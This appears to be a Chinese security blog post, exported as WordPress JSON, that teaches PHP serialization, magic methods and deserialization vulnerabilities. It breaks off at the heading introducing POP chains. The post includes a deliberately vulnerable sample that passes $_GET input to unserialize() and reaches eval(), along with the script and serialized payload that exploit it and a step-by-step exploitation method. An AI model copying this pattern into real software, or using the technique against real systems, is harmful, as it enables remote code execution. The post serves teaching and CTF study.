{"id":218,"date":"2022-04-08T15:54:00","date_gmt":"2022-04-08T07:54:00","guid":{"rendered":"http:\/\/danielw.top\/?p=218"},"modified":"2023-09-22T14:01:51","modified_gmt":"2023-09-22T06:01:51","slug":"%e5%ba%8f%e5%88%97%e5%8c%96%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e6%bc%8f%e6%b4%9e","status":"publish","type":"post","link":"http:\/\/danielw.top\/?p=218","title":{"rendered":"\u5e8f\u5217\u5316\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e"},"content":{"rendered":"

\u6982\u5ff5\u548c\u57fa\u7840\u77e5\u8bc6<\/h2>\n

\u5e8f\u5217\u5316\u548c\u53cd\u5e8f\u5217\u5316<\/h3>\n

\u5e8f\u5217\u5316\u5c31\u662f\u5c06\u4e00\u4e2a\u5bf9\u8c61\u8f6c\u6362\u6210\u5b57\u7b26\u4e32\u3002\u5b57\u7b26\u4e32\u5305\u62ec\uff0c\u5c5e\u6027\u540d\uff0c\u5c5e\u6027\u503c\uff0c\u5c5e\u6027\u7c7b\u578b\u548c\u8be5\u5bf9\u8c61\u5bf9\u5e94\u7684\u7c7b\u540d
\n\u53cd\u5e8f\u5217\u5316\u5219\u76f8\u53cd\u5c06\u5b57\u7b26\u4e32\u91cd\u65b0\u6062\u590d\u6210\u5bf9\u8c61<\/p>\n\n\n\n\n\n\n
\u7c7b\u578b<\/th>\n\u8fc7\u7a0b<\/th>\n<\/tr>\n<\/thead>\n
\u5e8f\u5217\u5316<\/td>\n\u5bf9\u8c61\u2192\u5b57\u7b26\u4e32<\/td>\n<\/tr>\n
\u53cd\u5e8f\u5217\u5316<\/td>\n\u5b57\u7b26\u4e32\u2192\u5bf9\u8c61<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

\u5bf9\u8c61\u7684\u5e8f\u5217\u5316\u5229\u4e8e\u5bf9\u8c61\u7684 \u4fdd\u5b58\u548c\u4f20\u8f93<\/strong> \uff0c\u4e5f\u53ef\u4ee5\u8ba9\u591a\u4e2a\u6587\u4ef6\u5171\u4eab\u5bf9\u8c61<\/strong><\/p>\n

\u9b54\u672f\u65b9\u6cd5<\/h3>\n

PHP\u5c06\u6240\u6709\u4ee5 __<\/strong> \uff08\u4e24\u4e2a\u4e0b\u5212\u7ebf\uff09\u5f00\u5934\u7684\u7c7b\u65b9\u6cd5\u4fdd\u7559\u4e3a\u9b54\u672f\u65b9\u6cd5<\/p>\n

__sleep<\/h4>\n

\u5728\u4f7f\u7528 serialize()<\/a> \u51fd\u6570\u65f6\uff0c\u7a0b\u5e8f\u4f1a\u68c0\u67e5\u7c7b\u4e2d\u662f\u5426\u5b58\u5728\u4e00\u4e2a __sleep()<\/a> \u9b54\u672f\u65b9\u6cd5\u3002\u5982\u679c\u5b58\u5728\uff0c\u5219\u8be5\u65b9\u6cd5\u4f1a\u5148\u88ab\u8c03\u7528\uff0c\u7136\u540e\u518d\u6267\u884c\u5e8f\u5217\u5316\u64cd\u4f5c\u3002<\/p>\n

__wakeup<\/h4>\n

\u5728\u4f7f\u7528 unserialize()<\/a> \u65f6\uff0c\u4f1a\u68c0\u67e5\u662f\u5426\u5b58\u5728\u4e00\u4e2a __wakeup()<\/a> \u9b54\u672f\u65b9\u6cd5\u3002\u5982\u679c\u5b58\u5728\uff0c\u5219\u8be5\u65b9\u6cd5\u4f1a\u5148\u88ab\u8c03\u7528\uff0c\u9884\u5148\u51c6\u5907\u5bf9\u8c61\u9700\u8981\u7684\u8d44\u6e90\u3002<\/p>\n

\u5f53\u6211\u4eec\u5728\u6267\u884cserialize()<\/code>\u548cunserialize()<\/code>\u65f6\uff0c\u4f1a\u5148\u8c03\u7528\u8fd9\u4e24\u4e2a\u51fd\u6570\u3002\u4f8b\u5982\u6211\u4eec\u5728\u5e8f\u5217\u5316\u4e00\u4e2a\u5bf9\u8c61\u65f6\uff0c\u8fd9\u4e2a\u5bf9\u8c61\u6709\u4e00\u4e2a\u6570\u636e\u5e93\u94fe\u63a5\uff0c\u60f3\u8981\u5728\u53cd\u5e8f\u5217\u5316\u4e2d\u6062\u590d\u94fe\u63a5\u72b6\u6001\uff0c\u5219\u53ef\u4ee5\u901a\u8fc7\u91cd\u6784\u8fd9\u4e24\u4e2a\u51fd\u6570\u6765\u5b9e\u73b0\u94fe\u63a5\u7684\u6062\u590d\u3002\u4f8b\u5b50\u5982\u4e0b\uff1a<\/p>\n

<?php\nclass Connection \n{\n    protected $link;\n    private $server, $username, $password, $db;\n\n    public function __construct($server, $username, $password, $db)\n    {\n        $this->server = $server;\n        $this->username = $username;\n        $this->password = $password;\n        $this->db = $db;\n        $this->connect();\n    }\n\n    private function connect()\n    {\n        $this->link = mysql_connect($this->server, $this->username, $this->password);\n        mysql_select_db($this->db, $this->link);\n    }\n\n    public function __sleep()\n    {\n        return array('server', 'username', 'password', 'db');\n    }\n\n    public function __wakeup()\n    {\n        $this->connect();\n    }\n}\n?><\/code><\/pre>\n
__toString<\/h4>\n
__toString()<\/a> \u65b9\u6cd5\u7528\u4e8e\u5b9a\u4e49\u4e00\u4e2a\u7c7b\u88ab\u5f53\u6210\u5b57\u7b26\u4e32\u65f6\u8be5\u5982\u4f55\u5904\u7406\u3002<\/p>\n
<?php\nclass TestClass\n{\n    public $foo;\n\n    public function __construct($foo)                                               \n    {\n        $this->foo = $foo;\n    }\n\n    public function __toString() {\n        return $this->foo;\n    }\n}\n\n$class = new TestClass('Hello');\necho $class;   \/\/ \u8fd0\u884c\u7ed3\u679c\uff1aHello\n?><\/code><\/pre>\n
__invoke<\/h4>\n
\u5f53\u5c1d\u8bd5\u4ee5\u8c03\u7528\u51fd\u6570\u7684\u65b9\u5f0f\u8c03\u7528\u4e00\u4e2a\u5bf9\u8c61\u65f6\uff0c__invoke()<\/a> \u65b9\u6cd5\u4f1a\u88ab\u81ea\u52a8\u8c03\u7528\u3002(\u672c\u7279\u6027\u53ea\u5728 PHP 5.3.0 \u53ca\u4ee5\u4e0a\u7248\u672c\u6709\u6548\u3002)<\/p>\n
<?php\nclass CallableClass \n{\n    function __invoke($x) {\n        var_dump($x);\n    }\n}\n$obj = new CallableClass;\n$obj(5);\nvar_dump(is_callable($obj));\n?><\/code><\/pre>\n
__construct<\/h4>\n
\u5177\u6709 __construct<\/strong> \u51fd\u6570\u7684\u7c7b\u4f1a\u5728\u6bcf\u6b21\u521b\u5efa\u65b0\u5bf9\u8c61\u65f6\u5148\u8c03\u7528\u6b64\u65b9\u6cd5\uff0c\u9002\u5408\u5728\u4f7f\u7528\u5bf9\u8c61\u4e4b\u524d\u505a\u4e00\u4e9b\u521d\u59cb\u5316\u5de5\u4f5c\u3002<\/p>\n
__destruct<\/h4>\n
__destruct<\/strong> \u51fd\u6570\u4f1a\u5728\u5230\u67d0\u4e2a\u5bf9\u8c61\u7684\u6240\u6709\u5f15\u7528\u90fd\u88ab\u5220\u9664\u6216\u8005\u5f53\u5bf9\u8c61\u88ab\u663e\u5f0f\u9500\u6bc1\u65f6\u6267\u884c<\/p>\n
__set<\/h4>\n
\u7ed9\u4e0d\u53ef\u8bbf\u95ee\u5c5e\u6027\u8d4b\u503c\u65f6\uff0c__set()<\/a> \u4f1a\u88ab\u8c03\u7528\u3002<\/p>\n
__get<\/h4>\n
\u8bfb\u53d6\u4e0d\u53ef\u8bbf\u95ee\u5c5e\u6027\u7684\u503c\u65f6\uff0c__get()<\/a> \u4f1a\u88ab\u8c03\u7528\u3002<\/p>\n
__isset<\/h4>\n
\u5bf9\u4e0d\u53ef\u8bbf\u95ee\u5c5e\u6027\u8c03\u7528 isset()<\/a> \u6216 empty()<\/a> \u65f6\uff0c__isset()<\/a> \u4f1a\u88ab\u8c03\u7528\u3002<\/p>\n
__unset<\/h4>\n
\u5bf9\u4e0d\u53ef\u8bbf\u95ee\u5c5e\u6027\u8c03\u7528 unset()<\/a> \u65f6\uff0c__unset()<\/a> \u4f1a\u88ab\u8c03\u7528\u3002<\/p>\n
__call<\/h4>\n
\u5728\u5bf9\u8c61\u4e2d\u8c03\u7528\u4e00\u4e2a\u4e0d\u53ef\u8bbf\u95ee\u65b9\u6cd5\u65f6\uff0c__call()<\/a> \u4f1a\u88ab\u8c03\u7528\u3002<\/p>\n
<?php\nclass MethodTest{\n    public function __call($name, $arguments){\n        \/\/ Note: value of $name is case sensitive.\n        echo "Triggering __call method when calling  method '$name' with arguments '" . implode(', ', $arguments). "'.\\n";\n    }\n}\n\n$obj = new MethodTest;\n$obj->callTest('arg1','arg2');\n\n\/*\u8fd0\u884c\u7ed3\u679c\nTriggering __call method when calling  method 'callTest' with arguments 'arg1, arg2'.\n*\/\n?><\/code><\/pre>\n
__callStatic<\/h3>\n
\u5728\u9759\u6001\u4e0a\u4e0b\u6587\u4e2d\u8c03\u7528\u4e00\u4e2a\u4e0d\u53ef\u8bbf\u95ee\u65b9\u6cd5\u65f6\uff0c__callStatic()<\/a> \u4f1a\u88ab\u8c03\u7528\u3002<\/p>\n
<?php\nclass MethodTest{\n    public static function __callStatic($name, $arguments){\n        \/\/ Note: value of $name is case sensitive.\n        echo "Triggering __call method when calling  method '$name' with arguments '" . implode(', ', $arguments). "'.\\n";\n    }\n}\n\nMethodTest::callStaticTest('arg3','arg4');  \/\/ As of PHP 5.3.0\n\/*\u8fd0\u884c\u7ed3\u679c\nTriggering __call method when calling  method 'callStaticTest' with arguments 'arg3, arg4'.\n*\/\n?><\/code><\/pre>\n
PHP\u7684\u5e8f\u5217\u5316<\/h2>\n
\u5e8f\u5217\u5316\u51fd\u6570serialize()<\/code><\/p>\n
\u9996\u5148\u6211\u521b\u4e00\u4e2aCtf<\/code>\u7c7b \u91cc\u9762\u5199\u4e86\u4e09\u4e2a\u5c5e\u6027 \u540e\u521b\u5efa\u4e86\u4e00\u4e2actfer<\/code>\u5bf9\u8c61 \u5c06Ctf<\/code>\u7c7b\u91cc\u7684\u4fe1\u606f\u8fdb\u884c\u4e86\u6539\u53d8\u3002\u5982\u679c\u540e\u9762\u8fd8\u8981\u7528\u5230\u8fd9\u4e2a\u5bf9\u8c61\uff0c\u5c31\u53ef\u4ee5\u5148\u5c06\u8fd9\u4e2a\u5bf9\u8c61\u8fdb\u884c\u5b9e\u4f8b\u5316\u3002\u7528\u7684\u65f6\u5019\u5728\u53cd\u5e8f\u5217\u5316\u51fa\u6765<\/p>\n
<?php \n    class Ctf{ \n        public $flag='flag{****}'; \n        public $name='cxk'; \n        public $age='10'; \n    } \n        $ctfer=new Ctf(); \/\/\u5b9e\u4f8b\u5316\u4e00\u4e2a\u5bf9\u8c61 \n        $ctfer->flag='flag{adedyui}'; \n        $ctfer->name='Sch0lar'; \n        $ctfer->age='18';\n        echo serialize($ctfer); \n?><\/code><\/pre>\n
\u8f93\u51fa\u7ed3\u679c<\/p>\n
\"image-20220408141639156\"<\/p>\n
O\u4ee3\u8868\u5bf9\u8c61\uff0c\u56e0\u4e3a\u6211\u4eec\u5e8f\u5217\u5316\u7684\u662f\u4e00\u4e2a\u5bf9\u8c61\uff1b\u5e8f\u5217\u5316\u6570\u7ec4\u7684\u8bdd\u5219\u7528A\u6765\u8868\u793a\n3\u4ee3\u8868\u7c7b\u7684\u540d\u5b57\u957f\u4e09\u4e2a\u5b57\u7b26\nCtf \u662f\u7c7b\u540d\n3\u4ee3\u8868\u8fd9\u4e2a\u7c7b\u91cc\u6709\u4e09\u4e2a\u5c5e\u6027(\u4e09\u4e2a\u53d8\u91cf)\ns\u4ee3\u8868\u5b57\u7b26\u4e32\n4\u4ee3\u8868\u5c5e\u6027\u540d\u7684\u957f\u5ea6\nflag\u662f\u5c5e\u6027\u540d\ns:13:"flag{adedyui}" \u5b57\u7b26\u4e32\uff0c\u5c5e\u6027\u957f\u5ea6\uff0c\u5c5e\u6027\u503c<\/code><\/pre>\n
serialize() \u51fd\u6570\u4f1a\u68c0\u67e5\u7c7b\u4e2d\u662f\u5426\u5b58\u5728\u4e00\u4e2a\u9b54\u672f\u65b9\u6cd5 __sleep()<\/code>\u3002\u5982\u679c\u5b58\u5728\uff0c__sleep()<\/code>\u65b9\u6cd5\u4f1a\u5148\u88ab\u8c03\u7528\uff0c\u7136\u540e\u624d\u6267\u884c\u5e8f\u5217\u5316\u64cd\u4f5c<\/p>\n
\u53ef\u4ee5\u5728__sleep()<\/code>\u65b9\u6cd5\u91cc\u51b3\u5b9a\u54ea\u4e9b\u5c5e\u6027\u53ef\u4ee5\u88ab\u5e8f\u5217\u5316\u3002\u5982\u679c\u6ca1\u6709__sleep()\u65b9\u6cd5\u5219\u9ed8\u8ba4\u5e8f\u5217\u5316\u6240\u6709\u5c5e\u6027<\/p>\n
\u793a\u4f8b\uff1a<\/p>\n
<?php \n    class Ctf{ \n        public $flag='flag{****}'; \n        public $name='cxk'; \n        public $age='10'; \n        public function __sleep(){ \n            return array('flag','age'); \n            } \n        } \n        $ctfer=new Ctf(); \n        $ctfer->flag='flag{abedyui}'; \n        $ctfer->name='Sch0lar'; \n        $ctfer->age='18'; \n        echo serialize($ctfer); \n?>\n\/\/ \u8f93\u51fa\u7ed3\u679c O:3:"Ctf":2:{s:4:"flag";s:13:"flag{abedyui}";s:3:"age";s:2:"18";}<\/code><\/pre>\n
\u5373__sleep()<\/code>\u65b9\u6cd5\u4f7f flag age \u5c5e\u6027\u5e8f\u5217\u5316\uff0c\u800cname\u5e76\u6ca1\u6709\u88ab\u5e8f\u5217\u5316<\/strong><\/p>\n
\u8bbf\u95ee\u63a7\u5236\u4fee\u9970\u7b26<\/h2>\n
\u6839\u636e\u8bbf\u95ee\u63a7\u5236\u4fee\u9970\u7b26\u7684\u4e0d\u540c<\/strong> \u5e8f\u5217\u5316\u540e\u7684 \u5c5e\u6027\u957f\u5ea6<\/strong>\u548c\u5c5e\u6027\u503c<\/strong>\u4f1a\u6709\u6240\u4e0d\u540c<\/p>\n
public(\u516c\u6709) \nprotected(\u53d7\u4fdd\u62a4)     \/\/ %00*%00\u5c5e\u6027\u540d\nprivate(\u79c1\u6709\u7684)       \/\/ %00\u7c7b\u540d%00\u5c5e\u6027\u540d<\/code><\/pre>\n
protected\u5c5e\u6027\u88ab\u5e8f\u5217\u5316\u7684\u65f6\u5019\u5c5e\u6027\u503c<\/strong>\u4f1a\u53d8\u6210%00*%00\u5c5e\u6027\u540d<\/strong>
\nprivate\u5c5e\u6027\u88ab\u5e8f\u5217\u5316\u7684\u65f6\u5019\u5c5e\u6027\u503c<\/strong>\u4f1a\u53d8\u6210%00\u7c7b\u540d%00\u5c5e\u6027\u540d<\/strong><\/p>\n
\uff08%00\u4e3a\u7a7a\u767d\u7b26\uff0c\u7a7a\u5b57\u7b26\u4e5f\u6709\u957f\u5ea6\uff0c\u4e00\u4e2a\u7a7a\u5b57\u7b26\u957f\u5ea6\u4e3a 1\uff09<\/p>\n
\u793a\u4f8b\uff1a<\/p>\n
<?php \n    class Ctf{ \n        public $name='Sch0lar'; \n        protected $age='19'; \n        private $flag='get flag'; \n        } \n        $ctfer=new Ctf(); \n        \/\/\u5b9e\u4f8b\u5316\u4e00\u4e2a\u5bf9\u8c61 echo serialize($ctfer); \n?> \n\/\/\u8f93\u51fa\u7ed3\u679c O:3:"Ctf":3:{s:4:"name";s:7:"Sch0lar";s:6:"*age";s:2:"19";s:9:"Ctfflag";s:8:"get flag";}<\/code><\/pre>\n
\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n
s:6:"*age"   \/\/*\u524d\u540e\u51fa\u73b0\u4e24\u4e2a\u7a7a\u767d\u7b26\uff0c\u4e00\u4e2a\u7a7a\u767d\u7b26\u957f\u5ea6\u4e3a1\uff0c\u6240\u4ee5\u5e8f\u5217\u5316\u540e\uff0c\u8be5\u5c5e\u6027\u957f\u5ea6\u4e3a6\ns:9:"Ctfflag"   \/\/\u7c7b\u540dCtf\u524d\u540e\u51fa\u73b0\u4e24\u4e2a%00\u7a7a\u767d\u7b26\uff0c\u6240\u4ee5\u957f\u5ea6\u4e3a9<\/code><\/pre>\n
PHP\u7684\u53cd\u5e8f\u5217\u5316<\/h2>\n
\u53cd\u5e8f\u5217\u5316\u51fd\u6570unserialize()<\/code>\u3002\u53cd\u5e8f\u5217\u5316\u5c31\u662f\u5c06\u4e00\u4e2a\u5e8f\u5217\u5316\u4e86\u7684\u5bf9\u8c61\u6216\u6570\u7ec4\u5b57\u7b26\u4e32\uff0c\u8fd8\u539f\u56de\u53bb<\/p>\n
<?php \n    class Ctf{ \n        public $flag='flag{****}'; \n        public $name='cxk'; \n        public $age='10'; \n    } \n        $ctfer=new Ctf(); \/\/\u5b9e\u4f8b\u5316\u4e00\u4e2a\u5bf9\u8c61 \n        $ctfer->flag='flag{adedyui}'; \n        $ctfer->name='Sch0lar'; \n        $ctfer->age='18';\n        $str=serialize($ctfer); \n        echo '<pre>'; var_dump(unserialize($str)) \n?> \n\/\/\u8f93\u51fa\u7ed3\u679c \nclass Ctf#2 (3) {\n  public $flag =>\n  string(13) "flag{adedyui}"\n  public $name =>\n  string(7) "Sch0lar"\n  public $age =>\n  string(2) "18"\n}<\/code><\/pre>\n
\u4e0e\u5e8f\u5217\u5316\u51fd\u6570\u7c7b\u4f3c\uff0cunserialize()\u4f1a\u68c0\u67e5\u7c7b\u4e2d\u662f\u5426\u5b58\u5728\u4e00\u4e2a__wakeup<\/code>\u9b54\u672f\u65b9\u6cd5
\n\u5982\u679c\u5b58\u5728\u5219\u4f1a\u5148\u8c03\u7528__wakeup()<\/code>\u65b9\u6cd5\uff0c\u518d\u8fdb\u884c\u5e8f\u5217\u5316<\/p>\n
\u53ef\u4ee5\u5728__wakeup()<\/code>\u65b9\u6cd5\u4e2d\u5bf9\u5c5e\u6027\u8fdb\u884c\u521d\u59cb\u5316\u3001\u8d4b\u503c\u6216\u8005\u6539\u53d8<\/p>\n
<?php \n    class Ctf{ \n        public $flag='flag{****}'; \n        public $name='cxk'; \n        public $age='10'; \n        public function __wakeup(){ \n            $this->flag='no flag'; \/\/\u5728\u53cd\u5e8f\u5217\u5316\u65f6\uff0cflag\u5c5e\u6027\u5c06\u88ab\u6539\u53d8\u4e3a\u201cno flag\u201d \n            }\n        }\n        $ctfer=new Ctf(); \/\/\u5b9e\u4f8b\u5316\u4e00\u4e2a\u5bf9\u8c61 \n        $ctfer->flag='flag{adedyui}'; \n        $ctfer->name='Sch0lar'; \n        $ctfer->age='18';\n        $str=serialize($ctfer); \n        echo '<pre>'; \n        var_dump(unserialize($str)); \n?><\/code><\/pre>\n
\u53cd\u5e8f\u5217\u5316\u4e4b\u524d\u91cd\u65b0\u7ed9flag\u5c5e\u6027\u8d4b\u503c<\/p>\n
class Ctf#2 (3) {\n  public $flag =>\n  string(7) "no flag"\n  public $name =>\n  string(7) "Sch0lar"\n  public $age =>\n  string(2) "18"\n}<\/code><\/pre>\n
PHP\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e<\/h2>\n
\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u7684\u6210\u56e0\u5728\u4e8e\u4ee3\u7801\u4e2d\u7684 unserialize()<\/code> \u63a5\u6536\u7684\u53c2\u6570\u53ef\u63a7\uff0c\u8fd9\u4e2a\u51fd\u6570\u7684\u53c2\u6570\u662f\u4e00\u4e2a\u5e8f\u5217\u5316\u7684\u5bf9\u8c61\uff0c\u800c\u5e8f\u5217\u5316\u7684\u5bf9\u8c61\u53ea\u542b\u6709\u5bf9\u8c61\u7684\u5c5e\u6027\uff0c\u90a3\u6211\u4eec\u5c31\u8981\u5229\u7528\u5bf9\u5bf9\u8c61\u5c5e\u6027\u7684\u7be1\u6539\u5b9e\u73b0\u6700\u7ec8\u7684\u653b\u51fb<\/p>\n
\u4ece\u4e0a\u9762\u7684\u5e8f\u5217\u5316\u548c\u53cd\u5e8f\u5217\u5316\u7684\u77e5\u8bc6\u6211\u4eec\u53ef\u4ee5\u77e5\u9053\uff0c\u5bf9\u8c61\u7684\u5e8f\u5217\u5316\u548c\u53cd\u5e8f\u5217\u5316\u53ea\u80fd\u662f\u91cc\u9762\u7684\u5c5e\u6027\uff0c\u4e5f\u5c31\u662f\u8bf4\u6211\u4eec\u901a\u8fc7\u7be1\u6539\u53cd\u5e8f\u5217\u5316\u7684\u5b57\u7b26\u4e32\u53ea\u80fd\u83b7\u53d6\u6216\u63a7\u5236\u5176\u4ed6\u7c7b\u7684\u5c5e\u6027\uff0c\u8fd9\u6837\u4e00\u6765\u5229\u7528\u9762\u5c31\u5f88\u7a84\uff0c\u56e0\u4e3a\u5c5e\u6027\u7684\u503c\u90fd\u662f\u5df2\u7ecf\u9884\u5148\u8bbe\u7f6e\u597d\u7684\uff0c\u5982\u679c\u6211\u4eec\u60f3\u5229\u7528\u7c7b\u91cc\u9762\u7684\u65b9\u6cd5\u5462\uff1f\u8fd9\u65f6\u5019\u9b54\u6cd5\u65b9\u6cd5\u5c31\u6d3e\u4e0a\u7528\u573a\u4e86\uff0c\u9b54\u6cd5\u6b63\u5982\u4e0a\u9762\u4ecb\u7ecd\u7684\uff0c\u9b54\u6cd5\u65b9\u6cd5\u7684\u8c03\u7528\u662f\u5728\u8be5\u7c7b\u5e8f\u5217\u5316\u6216\u8005\u53cd\u5e8f\u5217\u5316\u7684\u540c\u65f6\u81ea\u52a8\u5b8c\u6210\u7684\uff0c\u4e0d\u9700\u8981\u4eba\u5de5\u5e72\u9884\uff0c\u8fd9\u5c31\u975e\u5e38\u7b26\u5408\u6211\u4eec\u7684\u60f3\u6cd5\uff0c\u56e0\u6b64\u53ea\u8981\u9b54\u6cd5\u65b9\u6cd5\u4e2d\u51fa\u73b0\u4e86\u4e00\u4e9b\u6211\u4eec\u80fd\u5229\u7528\u7684\u51fd\u6570\uff0c\u6211\u4eec\u5c31\u80fd\u901a\u8fc7\u53cd\u5e8f\u5217\u5316\u4e2d\u5bf9\u5176\u5bf9\u8c61\u5c5e\u6027\u7684\u64cd\u63a7\u6765\u5b9e\u73b0\u5bf9\u8fd9\u4e9b\u51fd\u6570\u7684\u64cd\u63a7\uff0c\u8fdb\u800c\u8fbe\u5230\u6211\u4eec\u53d1\u52a8\u653b\u51fb\u7684\u76ee\u7684<\/p>\n
\u9b54\u672f\u65b9\u6cd5\u7684\u7b80\u5355\u5229\u7528<\/h3>\n
class demo {\n    var $test;\n    function __construct() {\n        $this->test = new L();\n    }\n\n    function __destruct() {\n        $this->test->action();\n    }\n}\n\nclass L {\n    function action() {\n        echo "function action() in class L";\n    }\n}\n\nclass Evil {\n    var $test2;\n    function action() {\n        eval($this->test2);\n    }\n}\n\nunserialize($_GET['test']);<\/code><\/pre>\n
\u9996\u5148\u6211\u4eec\u80fd\u770b\u5230unserialize()<\/code>\u51fd\u6570\u7684\u53c2\u6570\u6211\u4eec\u662f\u53ef\u4ee5\u63a7\u5236\u7684\uff0c\u4e5f\u5c31\u662f\u8bf4\u6211\u4eec\u80fd\u901a\u8fc7\u8fd9\u4e2a\u63a5\u53e3\u53cd\u5e8f\u5217\u5316\u4efb\u4f55\u7c7b\u7684\u5bf9\u8c61(\u4f46\u53ea\u6709\u5728\u5f53\u524d\u4f5c\u7528\u57df\u7684\u7c7b\u624d\u5bf9\u6211\u4eec\u6709\u7528)\uff0c\u90a3\u6211\u4eec\u770b\u4e00\u4e0b\u5f53\u524d\u8fd9\u4e09\u4e2a\u7c7b\uff0c\u6211\u4eec\u770b\u5230\u540e\u9762\u4e24\u4e2a\u7c7b\u53cd\u5e8f\u5217\u5316\u4ee5\u540e\u5bf9\u6211\u4eec\u6ca1\u6709\u4efb\u4f55\u610f\u4e49\uff0c\u56e0\u4e3a\u6211\u4eec\u6839\u672c\u6ca1\u6cd5\u8c03\u7528\u5176\u4e2d\u7684\u65b9\u6cd5\uff0c\u4f46\u662f\u7b2c\u4e00\u4e2a\u7c7b\u5c31\u4e0d\u4e00\u6837\u4e86\uff0c\u867d\u7136\u6211\u4eec\u4e5f\u6ca1\u6709\u4ec0\u4e48\u4ee3\u7801\u80fd\u5b9e\u73b0\u8c03\u7528\u5176\u4e2d\u7684\u65b9\u6cd5\u7684\uff0c\u4f46\u662f\u6211\u4eec\u53d1\u73b0\u4ed6\u6709\u4e00\u4e2a\u9b54\u6cd5\u51fd\u6570__destruct()<\/code> \uff0c\u8fd9\u5c31\u975e\u5e38\u6709\u8da3\u4e86\uff0c\u56e0\u4e3a\u8fd9\u4e2a\u51fd\u6570\u80fd\u5728\u5bf9\u8c61\u9500\u6bc1\u7684\u65f6\u5019\u81ea\u52a8\u8c03\u7528\uff0c\u4e0d\u7528\u6211\u4eec\u4eba\u5de5\u7684\u5e72\u9884\uff0c\u63a5\u4e0b\u6765\u8ba9\u6211\u4eec\u770b\u4e00\u4e0b\u600e\u4e48\u5229\u7528<\/p>\n
\u6211\u4eec\u770b\u5230__destruct()<\/code>\u91cc\u9762\u53ea\u7528\u5230\u4e86\u4e00\u4e2a\u5c5e\u6027test<\/code>\uff0c\u518d\u89c2\u5bdf\u4e00\u4e0b\u54ea\u4e9b\u5730\u65b9\u8c03\u7528\u4e86action()<\/code>\u51fd\u6570\uff0c\u770b\u770b\u8fd9\u4e2a\u51fd\u6570\u7684\u8c03\u7528\u4e2d\u6709\u6ca1\u6709\u5b58\u5728\u6267\u884c\u547d\u4ee4\u6216\u8005\u662f\u5176\u4ed6\u6211\u4eec\u80fd\u5229\u7528\u7684\u70b9\u7684\uff0c\u679c\u7136\u5728 Evil<\/code> \u8fd9\u4e2a\u7c7b\u4e2d\u53d1\u73b0\u4ed6\u7684 action()<\/code>\u51fd\u6570\u8c03\u7528\u4e86eval()<\/code>,\u90a3\u6211\u4eec\u7684\u60f3\u6cd5\u5c31\u5f88\u660e\u786e\u4e86\uff0c\u53ea\u9700\u8981\u5c06demo<\/code>\u8fd9\u4e2a\u7c7b\u4e2d\u7684test<\/code>\u5c5e\u6027\u7be1\u6539\u4e3a Evil<\/code>\u8fd9\u4e2a\u7c7b\u7684\u5bf9\u8c61\uff0c\u7136\u540e\u4e3a\u4e86eval<\/code> \u80fd\u6267\u884c\u547d\u4ee4\uff0c\u6211\u4eec\u8fd8\u8981\u7be1\u6539Evil<\/code>\u5bf9\u8c61\u7684test2<\/code> \u5c5e\u6027\uff0c\u5c06\u5176\u6539\u6210\u8981\u6267\u884c\u7684\u547d\u4ee4<\/p>\n
class demo {\n    var $test;\n    function __construct(){\n        $this->test = new Evil();                     \/\/\u8fd9\u91cc\u5c06 L \u6362\u6210 Evil\n        $this->test->test2 = "phpinfo();";            \/\/\u521d\u59cb\u5316\u5bf9\u8c61 $test2 \u503c\n    }\n    function __destruct(){\n        $this->test->action();\n    }\n}\nclass Evil {\n    var $test2;\n    function action(){\n        eval($this->test2);\n    }\n}\n\n$demo = new demo();\n$data = serialize($demo);\nvar_dump($data);<\/code><\/pre>\n
\u4ee5\u4e0a\u811a\u672c\u8f93\u51fa<\/p>\n
string(71) "O:4:"demo":1:{s:4:"test";O:4:"Evil":1:{s:5:"test2";s:10:"phpinfo();";}}"<\/code><\/pre>\n
\"image-20220408150637166\"<\/p>\n
\u8fd9\u6837\u5c31\u5b8c\u6210\u4e86\u4e00\u4e2a\u7b80\u5355\u7684PHP\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u7684\u5229\u7528<\/p>\n
\u901a\u8fc7\u8fd9\u4e2a\u7b80\u5355\u7684\u4f8b\u5b50\u603b\u7ed3\u4e00\u4e0b\u5bfb\u627e PHP \u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u7684\u65b9\u6cd5\u6216\u8005\u6d41\u7a0b<\/strong>\uff1a<\/p>\n
    \n
  1. \u5bfb\u627eunserialize()<\/code>\u51fd\u6570\u7684\u53c2\u6570\u662f\u5426\u6709\u6211\u4eec\u7684\u53ef\u63a7\u70b9\uff1b<\/li>\n
  2. \u5bfb\u627e\u6211\u4eec\u7684\u53cd\u5e8f\u5217\u5316\u7684\u76ee\u6807\uff0c\u91cd\u70b9\u5bfb\u627e\u5b58\u5728 wakeup()<\/code> \u6216 destruct()<\/code> \u9b54\u6cd5\u51fd\u6570\u7684\u7c7b\uff1b<\/li>\n
  3. \u4e00\u5c42\u4e00\u5c42<\/strong>\u5730\u7814\u7a76\u8be5\u7c7b\u5728\u9b54\u6cd5\u65b9\u6cd5\u4e2d\u4f7f\u7528\u7684\u5c5e\u6027\u548c\u5c5e\u6027\u8c03\u7528\u7684\u65b9\u6cd5\uff0c\u770b\u770b\u662f\u5426\u6709\u53ef\u63a7\u7684\u5c5e\u6027\u80fd\u5b9e\u73b0\u5728\u5f53\u524d\u8c03\u7528\u7684\u8fc7\u7a0b\u4e2d\u89e6\u53d1\u7684\uff1b<\/li>\n
  4. \u627e\u5230\u6211\u4eec\u8981\u63a7\u5236\u7684\u5c5e\u6027\u4e86\u4ee5\u540e\u6211\u4eec\u5c31\u5c06\u8981\u7528\u5230\u7684\u4ee3\u7801\u90e8\u5206\u590d\u5236\u4e0b\u6765\uff0c\u7136\u540e\u6784\u9020\u5e8f\u5217\u5316\uff0c\u53d1\u8d77\u653b\u51fb\u3002<\/li>\n<\/ol>\n
    PHP\u53cd\u5e8f\u5217\u5316POP\u94fe<\/h2>\n
    POP\u94fe\u4ecb\u7ecd<\/h3>\n
